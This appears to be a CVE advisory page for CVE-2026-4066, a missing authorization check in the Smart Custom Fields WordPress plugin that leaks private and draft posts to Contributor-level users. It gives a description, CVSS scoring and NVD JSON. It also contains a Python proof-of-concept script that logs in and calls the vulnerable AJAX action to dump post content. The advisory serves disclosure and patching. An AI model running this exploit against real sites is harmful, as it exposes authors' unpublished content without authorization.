Security Vulnerability Report
中文
CVE-2026-4066 CVSS 4.3 MEDIUM

CVE-2026-4066

Published: 2026-03-23 23:17:13
Last Modified: 2026-04-24 16:32:54
Source: [email protected]

Description

The Smart Custom Fields plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the relational_posts_search() function in all versions up to, and including, 5.0.6. This makes it possible for authenticated attackers, with Contributor-level access and above, to read private and draft post content from other authors via the smart-cf-relational-posts-search AJAX action. The function queries posts with post_status=any and returns full WP_Post objects including post_content, but only checks the generic edit_posts capability instead of verifying whether the requesting user has permission to read each individual post.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Smart Custom Fields <= 5.0.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Configuration target_url = "http://target-wordpress-site.com/wp-admin/admin-ajax.php" username = "contributor_user" password = "password123" def exploit(): # Create a session to handle cookies session = requests.Session() # 1. Authenticate as a low-privileged user (Contributor) login_url = "http://target-wordpress-site.com/wp-login.php" login_payload = { "log": username, "pwd": password, "redirect_to": "http://target-wordpress-site.com/wp-admin/", "wp-submit": "Log In", "testcookie": "1" } print("[*] Attempting to login as {}...".format(username)) login_response = session.post(login_url, data=login_payload) if login_response.status_code != 200: print("[-] Login failed.") return print("[+] Login successful.") # 2. Send exploit payload to vulnerable AJAX action # The action 'smart-cf-relational-posts-search' is vulnerable exploit_payload = { "action": "smart-cf-relational-posts-search", "q": "", # Empty query to potentially retrieve broad results or recent posts "post_type": "post" } print("[*] Sending exploit payload to {}...".format(target_url)) response = session.post(target_url, data=exploit_payload) # 3. Check for sensitive data in response if response.status_code == 200: print("[+] Request sent successfully.") print("[*] Response content:") print(response.text) # Check if response contains typical WordPress post structure if "post_content" in response.text or "post_title" in response.text: print("[!] Potential sensitive data found in response.") else: print("[-] Exploit request failed.") if __name__ == "__main__": exploit()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-4066", "sourceIdentifier": "[email protected]", "published": "2026-03-23T23:17:13.227", "lastModified": "2026-04-24T16:32:53.997", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Smart Custom Fields plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the relational_posts_search() function in all versions up to, and including, 5.0.6. This makes it possible for authenticated attackers, with Contributor-level access and above, to read private and draft post content from other authors via the smart-cf-relational-posts-search AJAX action. The function queries posts with post_status=any and returns full WP_Post objects including post_content, but only checks the generic edit_posts capability instead of verifying whether the requesting user has permission to read each individual post."}, {"lang": "es", "value": "El plugin Smart Custom Fields para WordPress es vulnerable al acceso no autorizado de datos debido a una comprobación de capacidad faltante en la función relational_posts_search() en todas las versiones hasta la 5.0.6, inclusive. Esto hace posible que atacantes autenticados, con acceso de nivel Colaborador y superior, lean contenido de publicaciones privadas y borradores de otros autores a través de la acción AJAX smart-cf-relational-posts-search. La función consulta publicaciones con post_status=any y devuelve objetos WP_Post completos, incluyendo post_content, pero solo comprueba la capacidad genérica edit_posts en lugar de verificar si el usuario solicitante tiene permiso para leer cada publicación individual."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/smart-custom-fields/trunk/classes/fields/class.field-related-posts.php#L101", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/smart-custom-fields/trunk/classes/fields/class.field-related-posts.php#L143", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/smart-custom-fields/trunk/classes/fields/class.field-related-posts.php#L78", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3485210%40smart-custom-fields%2Ftrunk&old=3416964%40smart-custom-fields%2Ftrunk&sfp_email=&sfph_mail=#file2", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/87f52e3a-e414-4f47-b46c-e3811e76744b?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.